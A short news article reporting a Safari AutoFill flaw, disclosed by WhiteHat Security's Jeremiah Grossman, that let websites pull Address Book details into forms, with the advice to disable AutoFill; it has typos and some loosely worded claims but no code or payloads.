Apple’s browser Safari has been under dark clouds lately and its troubles have only increased. Another severe flaw has been discovered in the browser. The weakness in the browser can be used to extract sensitive information about the user. The feature was actually designed to make it easy fro users to fill up their forms. However attackers too can actually extract the information for themselves with this facility.
The security concern was pointed out by the founder and CTO Jeremiah Grossman, of WhiteHat Security. He reported that the attackers can very easily use this flaw to make the Safari browser to AutoFill sensitive information like name, address, or e-mail address from the information stored in the Apple Safari’s local operating Address Book. Whereas this Safari’s feature was to make thing simpler by filling in information such as first and last name, work place, city, state, and e-mail address when it recognizes a form and is enabled on default.
However the problem arises when the feature dumps the data into the form even if a person has entered no data on a particular Web site and this is what the hackers can exploit. The Safari is in particular threatened among all the browsers as it transfers data to the websites even if users have never been there before or entered any personal information on that particular site.
The proof of the attack is the form of a code for attack has been too posted online. Further, Grossman also posted a video of the attack on his blog. Bu to everyone’s relief the feature has not been put up to any malicious use and has not been reported as yet. The attack could taken an enormous form had it been distributed on any advertising network. But the users are still safe as the exploit was way too simple to strike a cord and also because basically it is not an exploit code designed to deliver rootkit payload that are otherwise used by hacker for an attack.
The problem was reported to the largest technology company by the discoverer on April 17th but a reply or any official statement in this regard is still awaited.
The solution to this vulnerability is as simple as the problem. To prevent any attack the users ca simply turn off the AutoFill Web form. The flaw is present in all the web browsers including Safari on both Mac OS and iOS and the Google Chrome browser. But the threat is posed only on the Mac OS version which has a very small market presence. So the attack is limited to the very few people who use Safari on Mac OS.